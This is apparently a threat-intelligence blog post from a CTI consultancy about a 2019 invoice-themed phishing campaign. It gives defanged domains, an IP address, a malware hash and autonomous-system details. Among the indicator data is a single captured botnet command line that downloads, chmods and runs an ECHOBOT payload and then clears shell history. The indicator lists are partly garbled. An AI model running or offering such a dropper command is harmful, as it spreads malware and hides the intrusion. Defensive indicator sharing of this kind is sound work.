The “Mill Taste” Campaign


October 28, 2019

An active phishing campaign is being propagated from a Spanish-themed domain name that alludes to El Molino Sabor (in English: “Mill Taste”) and shows a close-up of a Sweet Potato or Yam on the landing page of the website.  The social engineering approach is an email from an “Accounting Manager” by the name of “Melissa Henry” who is sending a “copy” of a paid invoice.  In fact, it has attached a PDF and is coming with the subject line: Paid Invoice TT Copy. Based on my link analysis the PDF is infected with malware which will be described below.

Phishing Campaign Cyber Observables

The phishing domain is:  elmolinosabor[.]com

The phishing IP is:  146.112.61[.]107

Recent DNS History

The threat actor appears to have begun building his infrastructure on February 1, 2019 using an admin panel labeled “” at IP:  From the DNS history tracked by [redacted] it appears that the initial test run of the malicious infrastructure was on June 5th and 8th from www1-royalbank[.]cc and www1royalbank-petrocanada[.]com, respectively.

The same Splash page for all three of these events is showing as the same ‘Welcome!’ placeholder.

According to the [redacted] tool the autonomous system network for the above noted IP is:  AS202425 which is exhibiting multiple security issues including:

  • Route leaks (4)
  • Hijacks (111)
  • DDoS Amplifiers (326)
  • Static Loops (5)

Malware Artifacts

The most recently seen malware artifact as documented on [redacted] was the following WIN32 executable:  scaalqtw[.]exe (Hash: 533a8297086b4d014c1c65fcfccfdaf906890016f08d430ed0e1ebb3a4957fe9).As of August 15, 2019, 51 of 70 antivirus research firms have identified this malware as malicious including CheckPoint, CrowdStrike, FireEye, F-Secure, Kaspersky, Malwarebytes, McAfee, Microsoft, Panda, Palo Alto Networks, Sophos, TrendMicro, and Symantec. It is being characterized as a “heuristic”  “downloader” and a “Grandcrab.AF” Trojan.

As the viewer can see from the above screenshot the executable file is beaconing out to a Seychelles site and a .zz site (the question mark [?]) shown on the node graph representation. There are numerous “communicating” and referring nodes also associated with the .zz node identified by [redacted] as Hanover Hospital.  The Cyber Observables for this campaign are given below.

Contact CTIN for more information and the complete list of Cyber Observables of the Mill Taste Campaign.

Dropper Site Cyber Observables


Communicating Nodes Cyber Observables

7fe7a59e34d6c190309219d69fe11900daec7d82e0f6de36716d5068806fc814,,,,,,,,,,,,*,, /tmp; wget; chmod 777 ECHOBOT.x86; ./ECHOBOT.x86; rm -rf ECHOBOT.x86; history -c,,,,,,,

author avatar
RJG CTIN President & Co-Founder
Jane Ginn As the co-founder of the Cyber Threat Intelligence Network (CTIN), a consultancy with partners in Europe, Ms. Ginn has been pivotal in the development of the STIX international standard for modeling and sharing threat intelligence. She currently serves as the Secretary of the OASIS Threat Actor Context Technical Committee, contributing to the creation of a semantic technology ontology for cyber threat actor analysis. Her efforts in this area and her earlier work with the Cyber Threat Intelligence (CTI) TC earned her the 2020 Distinguished Contributor award from OASIS. In public service, she advised five Secretaries of the US Department of Commerce on international trade issues from 1994 to 2001 and served on the Washington District Export Council for five years. In the EU, she was an appointed member of the European Union's ENISA Threat Landscape Stakeholders' Group for four years. A world traveler and amateur photojournalist, she has visited over 50 countries, further enriching her global outlook and professional insights. Follow me on LinkedIn:
Translate »